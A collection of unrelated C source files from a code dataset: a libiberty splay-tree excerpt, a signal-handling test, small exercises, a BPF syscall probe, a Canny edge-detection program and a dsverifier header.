splay_tree_xmalloc_allocate (int size, void *data __attribute__ ((__unused__)))
{
return (void *) xmalloc (size);
}
static void
splay_tree_xmalloc_deallocate (void *object, void *data __attribute__ ((__unused__)))
{
free (object);
}
splay_tree
splay_tree_new (splay_tree_compare_fn compare_fn,
splay_tree_delete_key_fn delete_key_fn,
splay_tree_delete_value_fn delete_value_fn)
{
return (splay_tree_new_with_allocator
(compare_fn, delete_key_fn, delete_value_fn,
splay_tree_xmalloc_allocate, splay_tree_xmalloc_deallocate, 0));
}
splay_tree
splay_tree_new_with_allocator (splay_tree_compare_fn compare_fn,
splay_tree_delete_key_fn delete_key_fn,
splay_tree_delete_value_fn delete_value_fn,
splay_tree_allocate_fn allocate_fn,
splay_tree_deallocate_fn deallocate_fn,
void *allocate_data)
{
return
splay_tree_new_typed_alloc (compare_fn, delete_key_fn, delete_value_fn,
allocate_fn, allocate_fn, deallocate_fn,
allocate_data);
}
# 331 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c"
splay_tree
splay_tree_new_typed_alloc (splay_tree_compare_fn compare_fn,
splay_tree_delete_key_fn delete_key_fn,
splay_tree_delete_value_fn delete_value_fn,
splay_tree_allocate_fn tree_allocate_fn,
splay_tree_allocate_fn node_allocate_fn,
splay_tree_deallocate_fn deallocate_fn,
void * allocate_data)
{
splay_tree sp = (splay_tree) (*tree_allocate_fn)
(sizeof (struct splay_tree_s), allocate_data);
sp->root = 0;
sp->comp = compare_fn;
sp->delete_key = delete_key_fn;
sp->delete_value = delete_value_fn;
sp->allocate = node_allocate_fn;
sp->deallocate = deallocate_fn;
sp->allocate_data = allocate_data;
return sp;
}
void
splay_tree_delete (splay_tree sp)
{
splay_tree_delete_helper (sp, sp->root);
(*sp->deallocate) ((char*) sp, sp->allocate_data);
}
splay_tree_node
splay_tree_insert (splay_tree sp, splay_tree_key key, splay_tree_value value)
{
int comparison = 0;
splay_tree_splay (sp, key);
if (sp->root)
comparison = (*sp->comp)(sp->root->key, key);
if (sp->root && comparison == 0)
{
if (sp->delete_key)
(*sp->delete_key) (sp->root->key);
if (sp->delete_value)
(*sp->delete_value)(sp->root->value);
sp->root->key = key;
sp->root->value = value;
}
else
{
splay_tree_node node;
node = ((splay_tree_node)
(*sp->allocate) (sizeof (struct splay_tree_node_s),
sp->allocate_data));
node->key = key;
node->value = value;
if (!sp->root)
node->left = node->right = 0;
else if (comparison < 0)
{
node->left = sp->root;
node->right = node->left->right;
node->left->right = 0;
}
else
{
node->right = sp->root;
node->left = node->right->left;
node->right->left = 0;
}
sp->root = node;
}
return sp->root;
}
void
splay_tree_remove (splay_tree sp, splay_tree_key key)
{
splay_tree_splay (sp, key);
if (sp->root && (*sp->comp) (sp->root->key, key) == 0)
{
splay_tree_node left, right;
left = sp->root->left;
right = sp->root->right;
if (sp->delete_key)
(*sp->delete_key) (sp->root->key);
if (sp->delete_value)
(*sp->delete_value) (sp->root->value);
(*sp->deallocate) (sp->root, sp->allocate_data);
if (left)
{
sp->root = left;
if (right)
{
while (left->right)
left = left->right;
left->right = right;
}
}
else
sp->root = right;
}
}
splay_tree_node
splay_tree_lookup (splay_tree sp, splay_tree_key key)
{
splay_tree_splay (sp, key);
if (sp->root && (*sp->comp)(sp->root->key, key) == 0)
return sp->root;
else
return 0;
}
splay_tree_node
splay_tree_max (splay_tree sp)
{
splay_tree_node n = sp->root;
if (!n)
return
# 483 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c" 3 4
((void *)0)
# 483 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c"
;
while (n->right)
n = n->right;
return n;
}
splay_tree_node
splay_tree_min (splay_tree sp)
{
splay_tree_node n = sp->root;
if (!n)
return
# 499 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c" 3 4
((void *)0)
# 499 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c"
;
while (n->left)
n = n->left;
return n;
}
splay_tree_node
splay_tree_predecessor (splay_tree sp, splay_tree_key key)
{
int comparison;
splay_tree_node node;
if (!sp->root)
return
# 518 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c" 3 4
((void *)0)
# 518 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c"
;
splay_tree_splay (sp, key);
comparison = (*sp->comp)(sp->root->key, key);
if (comparison < 0)
return sp->root;
node = sp->root->left;
if (node)
while (node->right)
node = node->right;
return node;
}
splay_tree_node
splay_tree_successor (splay_tree sp, splay_tree_key key)
{
int comparison;
splay_tree_node node;
if (!sp->root)
return
# 549 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c" 3 4
((void *)0)
# 549 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c"
;
splay_tree_splay (sp, key);
comparison = (*sp->comp)(sp->root->key, key);
if (comparison > 0)
return sp->root;
node = sp->root->right;
if (node)
while (node->left)
node = node->left;
return node;
}
int
splay_tree_foreach (splay_tree sp, splay_tree_foreach_fn fn, void *data)
{
return splay_tree_foreach_helper (sp->root, fn, data);
}
int
splay_tree_compare_ints (splay_tree_key k1, splay_tree_key k2)
{
if ((int) k1 < (int) k2)
return -1;
else if ((int) k1 > (int) k2)
return 1;
else
return 0;
}
int
splay_tree_compare_pointers (splay_tree_key k1, splay_tree_key k2)
{
if ((char*) k1 < (char*) k2)
return -1;
else if ((char*) k1 > (char*) k2)
return 1;
else
return 0;
}
int
splay_tree_compare_strings (splay_tree_key k1, splay_tree_key k2)
{
return strcmp ((char *) k1, (char *) k2);
}
void
splay_tree_delete_pointers (splay_tree_value value)
{
free ((void *) value);
}
|
the_stack_data/92324222.c | /*
* Copyright (C) 2017-2021 Intel Corporation.
* SPDX-License-Identifier: MIT
*/
/*! @file
* This application tests that a set of synchronous signals (Exceptions) which are raised (sent asynchronously)
* are received by the handler that was set for them.
*
* When 1 is passes as an argument to the application it will also check a different scenarios where some of
* these signals are blocked when they are raised
*/
#include <stdio.h>
#include <pthread.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <assert.h>
#include <stdlib.h>
volatile int signalsReceived = 0; // Signal bitwise flag
#define ALL_SYNC_SIGNALS ((1 << SIGFPE) | (1 << SIGSEGV) | (1 << SIGILL) | (1 << SIGBUS) | (1 << SIGTRAP))
void Handler(int signum, siginfo_t* siginfo, void* _uctxt);
int CheckBlockedAysncExceptions()
{
struct sigaction act;
bzero(&act, sizeof(act));
act.sa_flags = SA_SIGINFO;
act.sa_sigaction = Handler;
sigaction(SIGFPE, &act, NULL);
sigaction(SIGSEGV, &act, NULL);
sigaction(SIGILL, &act, NULL);
sigaction(SIGBUS, &act, NULL);
sigaction(SIGTRAP, &act, NULL);
int ret;
sigset_t sigMask;
// Block SIGFPE and SIGSEGV
sigemptyset(&sigMask);
sigaddset(&sigMask, SIGFPE);
sigaddset(&sigMask, SIGSEGV);
ret = pthread_sigmask(SIG_BLOCK, &sigMask, NULL);
assert(0 == ret);
// Raise some Exceptions (SIGFPE and SIGSEGV among them)
raise(SIGFPE);
raise(SIGSEGV);
raise(SIGILL);
raise(SIGBUS);
// Verify SIGFPE and SIGSEGV were not received in handler
assert((signalsReceived & (1 << SIGFPE)) == 0);
assert((signalsReceived & (1 << SIGSEGV)) == 0);
// Remove SIGSEGV from the mask and unblock with mask (unblock SIGFPE)
sigdelset(&sigMask, SIGSEGV);
ret = pthread_sigmask(SIG_UNBLOCK, &sigMask, NULL);
assert(0 == ret);
// Verify SIGFPE was received in handler
assert((signalsReceived & (1 << SIGFPE)));
// Unblock SIGSEGV
sigemptyset(&sigMask);
sigaddset(&sigMask, SIGSEGV);
ret = pthread_sigmask(SIG_UNBLOCK, &sigMask, NULL);
assert(0 == ret);
// Verify SIGSEGV was received in handler
assert((signalsReceived & (1 << SIGSEGV)));
// Block SIGTRAP (after that raise it)
sigemptyset(&sigMask);
sigaddset(&sigMask, SIGTRAP);
ret = pthread_sigmask(SIG_BLOCK, &sigMask, NULL);
assert(0 == ret);
raise(SIGTRAP);
// Verify SIGTRAP wasn't not received in handler
assert((signalsReceived & (1 << SIGTRAP)) == 0);
// Retrieve current mask
ret = pthread_sigmask(SIG_SETMASK, NULL, &sigMask);
assert(0 == ret);
// Unblock SIGTRAP by removing SIGTRAP from mask and then using SIG_SETMASK.
// This checks another interesting scenario
sigdelset(&sigMask, SIGTRAP);
ret = pthread_sigmask(SIG_SETMASK, &sigMask, NULL);
assert(0 == ret);
// Verify SIGTRAP was received in handler
assert((signalsReceived & (1 << SIGTRAP)));
// Verify All signals received by handler
if (signalsReceived == ALL_SYNC_SIGNALS)
{
printf("All signals were received in first phase\n");
}
else
{
printf("Not all signals were received in first phase\n");
return 1;
}
//
// Phase 2, raise a few signals more than once before unblocking (Another case we want to check)
//
// Clear signalsReceived first
signalsReceived = 0;
sigemptyset(&sigMask);
sigaddset(&sigMask, SIGILL);
sigaddset(&sigMask, SIGBUS);
ret = pthread_sigmask(SIG_BLOCK, &sigMask, NULL);
assert(0 == ret);
// SIGILL 3 times, SIGBUS 2 times
raise(SIGILL);
raise(SIGSEGV);
raise(SIGBUS);
raise(SIGTRAP);
raise(SIGILL);
raise(SIGBUS);
raise(SIGILL);
ret = pthread_sigmask(SIG_UNBLOCK, &sigMask, NULL);
assert(0 == ret);
raise(SIGFPE);
// Check again
if (signalsReceived == ALL_SYNC_SIGNALS)
{
printf("All signals were received in second phase\n");
return 0;
}
else
{
printf("Not all signals were received in second phase\n");
return 1;
}
}
int CheckAysncExceptions()
{
struct sigaction act;
bzero(&act, sizeof(act));
act.sa_flags = SA_SIGINFO;
act.sa_sigaction = Handler;
sigaction(SIGFPE, &act, NULL);
sigaction(SIGSEGV, &act, NULL);
sigaction(SIGILL, &act, NULL);
sigaction(SIGBUS, &act, NULL);
sigaction(SIGTRAP, &act, NULL);
raise(SIGFPE);
raise(SIGSEGV);
raise(SIGILL);
raise(SIGBUS);
raise(SIGTRAP);
if (signalsReceived == ALL_SYNC_SIGNALS)
{ //Verifying all signals were handled by the handler
printf("All signals were received\n");
return 0;
}
else
{
printf("Not all signals were received\n");
return 1;
}
}
int main(int argc, char* argv[])
{
if (argc > 1)
{
if (atoi(argv[1]) == 1)
{
return CheckBlockedAysncExceptions();
}
else
{
return 1;
}
}
return CheckAysncExceptions();
}
void Handler(int signum, siginfo_t* siginfo, void* _uctxt)
{
signalsReceived |= (1 << signum);
printf("received signal %d\n", signum);
}
|
the_stack_data/100140240.c | #include <stdio.h>
unsigned char SetBit(unsigned char dest_data, unsigned char bit_num) {
if (bit_num < 8) dest_data = dest_data | (0x01 << bit_num);
return dest_data;
}
void main() {
unsigned char lamp_state = 0x77;
printf("%X->", lamp_state);
lamp_state = SetBit(lamp_state, 3);
printf("%X\n", lamp_state);
}
|
the_stack_data/187643894.c | // SPDX-License-Identifier: GPL-2.0
#include <asm/unistd.h>
#include <linux/bpf.h>
#include <unistd.h>
#ifndef __NR_bpf
# if defined(__i386__)
# define __NR_bpf 357
# elif defined(__x86_64__)
# define __NR_bpf 321
# elif defined(__aarch64__)
# define __NR_bpf 280
# elif defined(__sparc__)
# define __NR_bpf 349
# elif defined(__s390__)
# define __NR_bpf 351
# elif defined(__mips__) && defined(_ABIO32)
# define __NR_bpf 4355
# elif defined(__mips__) && defined(_ABIN32)
# define __NR_bpf 6319
# elif defined(__mips__) && defined(_ABI64)
# define __NR_bpf 5315
# else
# error __NR_bpf not defined. libbpf does not support your arch.
# endif
#endif
int main(void)
{
union bpf_attr attr;
/* Check fields in attr */
attr.prog_type = BPF_PROG_TYPE_KPROBE;
attr.insn_cnt = 0;
attr.insns = 0;
attr.license = 0;
attr.log_buf = 0;
attr.log_size = 0;
attr.log_level = 0;
attr.kern_version = 0;
attr.prog_flags = 0;
/*
* Test existence of __NR_bpf and BPF_PROG_LOAD.
* This call should fail if we run the testcase.
*/
return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}
|
the_stack_data/126703956.c | #include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define MAX_LEN 50
#define MAX_HOPS 50
int *hop(int *);
int is_in_bound(int *, int, int *);
int main()
{
int arr[MAX_LEN], *p, hops, flag, num, lim=0;
num=0;
while(scanf("%d", &arr[num]) != EOF) num++;
flag=0;
p=arr;
hops=0;
while(*p!=0 && hops<MAX_HOPS && lim<1)
{
p=hop(p);
lim=is_in_bound(arr,num,p);
hops++;
}
if(*p==0 && lim!=1)
{
flag=1;
}
printf("%d\n%d",flag,hops);
return 0;
}
int *hop(int *elem)
{
elem=elem+*elem;
return elem;
}
int is_in_bound(int *arr, int size, int *ptr)
{
if(ptr>=arr && ptr<=(arr+size))
{
return 0;
}
else return 1;
}
|
the_stack_data/93887975.c | #include<stdio.h>
int A = 5;
const char a[] = "hallo danke";
int main()
{
printf("hello world\n");
printf("%i\n",A);
printf("%s\n",a);
return 0;
}
|
the_stack_data/190768594.c | #include <sys/socket.h>
ssize_t recv(int fd, void *buf, size_t len, int flags)
{
#ifdef USE_HOST_NET
// lkl_printf("%s %d %d\n", __func__, __LINE__, fd);
if (fd < 1000)
return wrap_recv(fd, buf, len, flags);
#endif
return recvfrom(fd, buf, len, flags, 0, 0);
}
|
the_stack_data/126240.c | #include <stdio.h>
#include <math.h>
#include <string.h>
#include <stdlib.h>
#define N 420 /* frame dimension for QCIF format */
#define M 280 /* frame dimension for QCIF format */
#define filename "bus_420x280.yuv"
#define file_yuv "result.yuv"
#pragma arm section zidata="ram"
int Eo[M+2][N+2];
int gaussianMask[3][3];
int GxMask[3][3];
int GyMask[3][3];
int i, j, k, newPixel, newPixel2, newPixel3,newPixel4, newPixely;
int newPixel2y,newPixel3y,newPixel4y;
int row, col, kernelRow, kernelCol;
int limit=1;
int limit_gauss=1;
#pragma arm section
/* code for armulator*/
// declare variables
int buffer1[N+2];
int buffer2[N+2];
int buffer3[N+2];
int current[M][N];
int output_gaussian[M+2][N+2];
int Es[M+2][N+2];
int Igx[M+2][N+2];
int Igy[M+2][N+2];
int Edges[M+2][N+2];
int NonMax[M][N];
int temp[M+2][N+2];
int *s = &Es[0][0];
int *o = &Eo[0][0];
int *igx = &Igx[0][0];
int *igy = &Igy[0][0];
int searched[M+2][N+2]={0};
int T1=230;
int T2=245;
// ====================================================================
// read image
void read()
{
FILE *frame_c;
if((frame_c=fopen(filename,"rb"))==NULL)
{
printf("current frame doesn't exist\n");
exit(-1);
}
for(i=0;i<M;i++)
{
for(j=0;j<N;j+=4)
{
current[i][j]=fgetc(frame_c);
current[i][j+1]=fgetc(frame_c);
current[i][j+2]=fgetc(frame_c);
current[i][j+3]=fgetc(frame_c);
}
}
fclose(frame_c);
}
// ====================================================================
//write image
void write()
{
FILE *frame_yuv;
frame_yuv=fopen(file_yuv,"wb");
for(i=0;i<M;i++)
{
for(j=0;j<N;j+=4)
{
fputc(Edges[i][j],frame_yuv);
fputc(Edges[i][j+1],frame_yuv);
fputc(Edges[i][j+2],frame_yuv);
fputc(Edges[i][j+3],frame_yuv);
}
}
fclose(frame_yuv);
}
// ====================================================================
// blur image using Gaussian kernel
void gaussian_blur()
{
for(i=0;i<(M+2);i++)
{
for(j=0;j<(N+2);j+=4)
{
temp[i][j]=0;
temp[i][j+1]=0;
temp[i][j+2]=0;
temp[i][j+3]=0;
}
}
for(i=1;i<(M+1);i++)
{
for(j=1;j<(N+1);j+=4)
{
temp[i][j]=current[i-1][j-1];
temp[i][j+1]=current[i-1][j];
temp[i][j+2]=current[i-1][j+1];
temp[i][j+3]=current[i-1][j+2];
}
}
// declare Gaussian mask
gaussianMask[0][0] = 1; gaussianMask[0][1] = 2; gaussianMask[0][2] = 1;
gaussianMask[1][0] = 2; gaussianMask[1][1] = 4; gaussianMask[1][2] = 2;
gaussianMask[2][0] = 1; gaussianMask[2][1] = 2; gaussianMask[2][2] = 1;
// for every pixel
for (row=limit_gauss;row<=M+limit_gauss;row++){
if (row==1) {
for(k=0;k<N+2;k++) {
buffer1[k] = temp[0][k];
buffer2[k] = temp[1][k];
buffer3[k] = temp[2][k];
}
} else {
for (k=0;k<N+2;k++) {
buffer1[k] = buffer2[k];
buffer2[k] = buffer3[k];
buffer3[k] = temp[row+1][k];
}
}
for (col=limit_gauss;col<=N+limit_gauss;col+=4){
newPixel = 0;
newPixel2 = 0;
newPixel3 = 0;
newPixel4 = 0;
// for every kernel pixel
for (kernelCol=-limit_gauss;kernelCol<=limit_gauss; kernelCol++){
newPixel = newPixel + buffer1[col+kernelCol]*gaussianMask[0][limit_gauss+kernelCol];
newPixel = newPixel + buffer2[col+kernelCol]*gaussianMask[1][limit_gauss+kernelCol];
newPixel = newPixel + buffer3[col+kernelCol]*gaussianMask[2][limit_gauss+kernelCol];
newPixel2 = newPixel2 + buffer1[col+1+kernelCol]*gaussianMask[0][limit_gauss+kernelCol];
newPixel2 = newPixel2 + buffer2[col+1+kernelCol]*gaussianMask[1][limit_gauss+kernelCol];
newPixel2 = newPixel2 + buffer3[col+1+kernelCol]*gaussianMask[2][limit_gauss+kernelCol];
newPixel3 = newPixel3 + buffer1[col+2+kernelCol]*gaussianMask[0][limit_gauss+kernelCol];
newPixel3 = newPixel3 + buffer2[col+2+kernelCol]*gaussianMask[1][limit_gauss+kernelCol];
newPixel3 = newPixel3 + buffer3[col+2+kernelCol]*gaussianMask[2][limit_gauss+kernelCol];
newPixel4 = newPixel4 + buffer1[col+3+kernelCol]*gaussianMask[0][limit_gauss+kernelCol];
newPixel4 = newPixel4 + buffer2[col+3+kernelCol]*gaussianMask[1][limit_gauss+kernelCol];
newPixel4 = newPixel4 + buffer3[col+3+kernelCol]*gaussianMask[2][limit_gauss+kernelCol];
}
output_gaussian[row][col] = (int)(floor(newPixel)/16);
output_gaussian[row][col+1] = (int)(floor(newPixel2)/16);
output_gaussian[row][col+2] = (int)(floor(newPixel3)/16);
output_gaussian[row][col+3] = (int)(floor(newPixel4)/16);
}
}
}
// ====================================================================
// find gradients
void sobel()
{
// declare Sobel masks
GxMask[0][0] = -1; GxMask[0][1] = 0; GxMask[0][2] = 1;
GxMask[1][0] = -2; GxMask[1][1] = 0; GxMask[1][2] = 2;
GxMask[2][0] = -1; GxMask[2][1] = 0; GxMask[2][2] = 1;
GyMask[0][0] = 1; GyMask[0][1] = 2; GyMask[0][2] = 1;
GyMask[1][0] = 0; GyMask[1][1] = 0; GyMask[1][2] = 0;
GyMask[2][0] = -1; GyMask[2][1] = -2; GyMask[2][2] = -1;
// compute Igx and Igy
for (row=limit;row<=(M+limit);row++){
if (row==1) {
for(k=0;k<N+2;k++) {
buffer1[k] = output_gaussian[0][k];
buffer2[k] = output_gaussian[1][k];
buffer3[k] = output_gaussian[2][k];
}
} else {
for (k=0;k<N+2;k++) {
buffer1[k] = buffer2[k];
buffer2[k] = buffer3[k];
buffer3[k] = output_gaussian[row+1][k];
}
}
for (col=limit;col<=(N+limit);col+=4){
newPixel = 0;
newPixel2 = 0;
newPixel3 = 0;
newPixel4 = 0;
newPixely = 0;
newPixel2y = 0;
newPixel3y = 0;
newPixel4y = 0;
for (kernelCol=-limit;kernelCol<=limit; kernelCol++){
newPixel = newPixel + buffer1[col+kernelCol]*GxMask[0][limit_gauss+kernelCol];
newPixel = newPixel + buffer2[col+kernelCol]*GxMask[1][limit_gauss+kernelCol];
newPixel = newPixel + buffer3[col+kernelCol]*GxMask[2][limit_gauss+kernelCol];
newPixel2 = newPixel2 + buffer1[col+1+kernelCol]*GxMask[0][limit_gauss+kernelCol];
newPixel2 = newPixel2 + buffer2[col+1+kernelCol]*GxMask[1][limit_gauss+kernelCol];
newPixel2 = newPixel2 + buffer3[col+1+kernelCol]*GxMask[2][limit_gauss+kernelCol];
newPixel3 = newPixel3 + buffer1[col+2+kernelCol]*GxMask[0][limit_gauss+kernelCol];
newPixel3 = newPixel3 + buffer2[col+2+kernelCol]*GxMask[1][limit_gauss+kernelCol];
newPixel3 = newPixel3 + buffer3[col+2+kernelCol]*GxMask[2][limit_gauss+kernelCol];
newPixel4 = newPixel4 + buffer1[col+3+kernelCol]*GxMask[0][limit_gauss+kernelCol];
newPixel4 = newPixel4 + buffer2[col+3+kernelCol]*GxMask[1][limit_gauss+kernelCol];
newPixel4 = newPixel4 + buffer3[col+3+kernelCol]*GxMask[2][limit_gauss+kernelCol];
newPixely = newPixely + buffer1[col+kernelCol]*GyMask[0][limit_gauss+kernelCol];
newPixely = newPixely + buffer2[col+kernelCol]*GyMask[1][limit_gauss+kernelCol];
newPixely = newPixely + buffer3[col+kernelCol]*GyMask[2][limit_gauss+kernelCol];
newPixel2y = newPixel2y + buffer1[col+1+kernelCol]*GyMask[0][limit_gauss+kernelCol];
newPixel2y = newPixel2y + buffer2[col+1+kernelCol]*GyMask[1][limit_gauss+kernelCol];
newPixel2y = newPixel2y + buffer3[col+1+kernelCol]*GyMask[2][limit_gauss+kernelCol];
newPixel3y = newPixel3y + buffer1[col+2+kernelCol]*GyMask[0][limit_gauss+kernelCol];
newPixel3y = newPixel3y + buffer2[col+2+kernelCol]*GyMask[1][limit_gauss+kernelCol];
newPixel3y = newPixel3y + buffer3[col+2+kernelCol]*GyMask[2][limit_gauss+kernelCol];
newPixel4y = newPixel4y + buffer1[col+3+kernelCol]*GyMask[0][limit_gauss+kernelCol];
newPixel4y = newPixel4y + buffer2[col+3+kernelCol]*GyMask[1][limit_gauss+kernelCol];
newPixel4y = newPixel4y + buffer3[col+3+kernelCol]*GyMask[2][limit_gauss+kernelCol];
}
Igx[row][col] = (int)(floor(newPixel));
Igx[row][col+1] = (int)(floor(newPixel2));
Igx[row][col+2] = (int)(floor(newPixel3));
Igx[row][col+3] = (int)(floor(newPixel4));
Igy[row][col] = (int)(floor(newPixely));
Igy[row][col+1] = (int)(floor(newPixel2y));
Igy[row][col+2] = (int)(floor(newPixel3y));
Igy[row][col+3] = (int)(floor(newPixel4y));
}
}
// compute Es and Eo
for (i=0;i<=N*M;i+=4) {
*s = sqrt((*igx)*(*igx)+(*igy)*(*igy));
*o = atan2(*igx,*igy)/3.14159 * 180;
if(*s>=255)
{
*s = 255;
}
*s++ ;
*o++ ;
*igx++ ;
*igy++ ;
*s = sqrt((*igx)*(*igx)+(*igy)*(*igy));
*o = atan2(*igx,*igy)/3.14159 * 180;
if(*s>=255)
{
*s = 255;
}
*s++ ;
*o++ ;
*igx++ ;
*igy++ ;
*s = sqrt((*igx)*(*igx)+(*igy)*(*igy));
*o = atan2(*igx,*igy)/3.14159 * 180;
if(*s>=255)
{
*s = 255;
}
*s++ ;
*o++ ;
*igx++ ;
*igy++ ;
*s = sqrt((*igx)*(*igx)+(*igy)*(*igy));
*o = atan2(*igx,*igy)/3.14159 * 180;
if(*s>=255)
{
*s = 255;
}
*s++ ;
*o++ ;
*igx++ ;
*igy++ ;
}
}
// ====================================================================
// non-maximum suppression
void nonSup() {
for (col=0; col<N;col++) {
for (row=0;row<M;row+=4) {
NonMax[row][col] = Es[row][col];
NonMax[row+1][col] = Es[row+1][col];
NonMax[row+2][col] = Es[row+2][col];
NonMax[row+3][col] = Es[row+3][col];
}
}
// for every pixel
for (row=0; row<(M);row++) {
for (col=0;col<(N);col++)
{
//Horizontal Edge
if (((-22.5 < Eo[row][col]) && (Eo[row][col] <= 22.5)) || ((157.5 < Eo[row][col]) && (Eo[row][col] <= -157.5)))
{
if ((Es[row][col] < Es[row][col+1]) || (Es[row][col] < Es[row][col-1]))
{
NonMax[row][col] = 0;
}
}
//Vertical Edge
if (((-112.5 < Eo[row][col]) && (Eo[row][col] <= -67.5)) || ((67.5 < Eo[row][col]) && (Eo[row][col] <= 112.5)))
{
if ((Es[row][col] < Es[row+1][col]) || (Es[row][col] < Es[row-1][col]))
{
NonMax[row][col] = 0;
}
}
//+45 Degree Edge
if (((-67.5 < Eo[row][col]) && (Eo[row][col] <= -22.5)) || ((112.5 < Eo[row][col]) && (Eo[row][col] <= 157.5)))
{
if ((Es[row][col] < Es[row+1][col+1]) || (Es[row][col] < Es[row-1][col+1]))
{
NonMax[row][col] = 0;
}
}
//-45 Degree Edge
if (((-157.5 < Eo[row][col]) && (Eo[row][col] <= -112.5)) || ((67.5 < Eo[row][col]) && (Eo[row][col] <= 22.5)))
{
if ((Es[row][col] < Es[row+1][col+1]) || (Es[row][col] < Es[row-1][col-1]))
{
NonMax[row][col] = 0;
}
}
}
}
}
// ====================================================================
void neighbor_loop(int Row, int Col){
//Horizontal Edge
if (((-22.5 < Eo[Row][Col]) && (Eo[Row][Col] <= 22.5)) || ((157.5 < Eo[Row][Col]) && (Eo[Row][Col] <= -157.5)))
{
if(NonMax[Row][Col+1]>T1 && searched[Row][Col+1]!=0)
{
Edges[Row][Col+1]=255;
neighbor_loop(Row,Col+1);
searched[Row][Col+1]=1;
}
else if(NonMax[Row][Col-1]>T1 && searched[Row][Col-1]!=0)
{
Edges[Row][Col-1]=255;
neighbor_loop(Row,Col-1);
searched[Row][Col-1]=1;
}
}
//Vertical Edge
else if (((-112.5 < Eo[Row][Col]) && (Eo[Row][Col] <= -67.5)) || ((67.5 < Eo[Row][Col]) && (Eo[Row][Col] <= 112.5)))
{
if(NonMax[Row+1][Col]>T1 && searched[Row+1][Col]!=0)
{
Edges[Row+1][Col]=255;
neighbor_loop(Row+1,Col);
searched[Row+1][Col]=1;
}
else if(NonMax[Row-1][Col]>T1 && searched[Row-1][Col]!=0)
{
Edges[Row-1][Col]=255;
neighbor_loop(Row-1,Col);
searched[Row-1][Col]=1;
}
}
//+45 Degree Edge
else if (((-67.5 < Eo[Row][Col]) && (Eo[Row][Col] <= -22.5)) || ((112.5 < Eo[Row][Col]) && (Eo[Row][Col] <= 157.5)))
{
if(NonMax[Row-1][Col+1]>T1 && searched[Row-1][Col+1]!=0)
{
Edges[Row-1][Col+1]=255;
neighbor_loop(Row-1,Col+1);
searched[Row-1][Col+1]=1;
}
else if(NonMax[Row+1][Col-1]>T1 && searched[Row+1][Col-1]!=0)
{
Edges[Row+1][Col-1]=255;
neighbor_loop(Row+1,Col-1);
searched[Row+1][Col-1]=1;
}
}
//-45 Degree Edge
else if (((-157.5 < Eo[Row][Col]) && (Eo[Row][Col] <= -112.5)) || ((67.5 < Eo[Row][Col]) && (Eo[Row][Col] <= 22.5)))
{
if(NonMax[Row+1][Col+1]>T1 && searched[Row+1][Col+1]!=0)
{
Edges[Row+1][Col+1]=255;
neighbor_loop(Row+1,Col+1);
searched[Row+1][Col+1]=1;
}
else if(NonMax[Row-1][Col-1]>T1 && searched[Row-1][Col-1]!=0)
{
Edges[Row-1][Col-1]=255;
neighbor_loop(Row-1,Col-1);
searched[Row-1][Col-1]=1;
}
}
}
// ====================================================================
// hysterisis with double thresholding
void hysteresis(){
for (row=0; row<(M);row++) {
for (col=0;col<(N);col+=4)
{
if(NonMax[row][col]<T1)
{
Edges[row][col]=0;
}
else if(NonMax[row][col]>T2)
{
Edges[row][col]=255;
neighbor_loop(row,col);
}
if(NonMax[row][col+1]<T1)
{
Edges[row][col+1]=0;
}
else if(NonMax[row][col+1]>T2)
{
Edges[row][col+1]=255;
neighbor_loop(row,col+1);
}
if(NonMax[row][col+2]<T1)
{
Edges[row][col+2]=0;
}
else if(NonMax[row][col+2]>T2)
{
Edges[row][col+2]=255;
neighbor_loop(row,col+2);
}
if(NonMax[row][col+3]<T1)
{
Edges[row][col+3]=0;
}
else if(NonMax[row][col+3]>T2)
{
Edges[row][col+3]=255;
neighbor_loop(row,col+3);
}
}
}
}
int main() {
read();
gaussian_blur();
sobel();
nonSup();
hysteresis();
write();
printf("ok");
}
|
the_stack_data/148578697.c | # 1 "benchmarks/ds-06-impl3.c"
# 1 "<built-in>"
# 1 "<command-line>"
# 1 "/usr/include/stdc-predef.h" 1 3 4
# 1 "<command-line>" 2
# 1 "benchmarks/ds-06-impl3.c"
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 1
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h"
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/definitions.h" 1
# 132 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/definitions.h"
int X_SIZE_VALUE = 0;
int overflow_mode = 1;
int rounding_mode = 0;
# 155 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/definitions.h"
typedef struct {
double a[100];
int a_size;
double b[100];
int b_size;
double sample_time;
double a_uncertainty[100];
double b_uncertainty[100];
} digital_system;
typedef struct {
double A[4][4];
double B[4][4];
double C[4][4];
double D[4][4];
double states[4][4];
double outputs[4][4];
double inputs[4][4];
double K[4][4];
unsigned int nStates;
unsigned int nInputs;
unsigned int nOutputs;
} digital_system_state_space;
typedef struct {
int int_bits;
int frac_bits;
double max;
double min;
int default_realization;
double delta;
int scale;
double max_error;
} implementation;
typedef struct {
int push;
int in;
int sbiw;
int cli;
int out;
int std;
int ldd;
int subi;
int sbci;
int lsl;
int rol;
int add;
int adc;
int adiw;
int rjmp;
int mov;
int sbc;
int ld;
int rcall;
int cp;
int cpc;
int ldi;
int brge;
int pop;
int ret;
int st;
int brlt;
int cpi;
} instructions;
typedef struct {
long clock;
int device;
double cycle;
instructions assembly;
} hardware;
typedef struct{
float Ap, Ar, Ac;
float wp, wc, wr;
int type;
}filter_parameters;
# 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
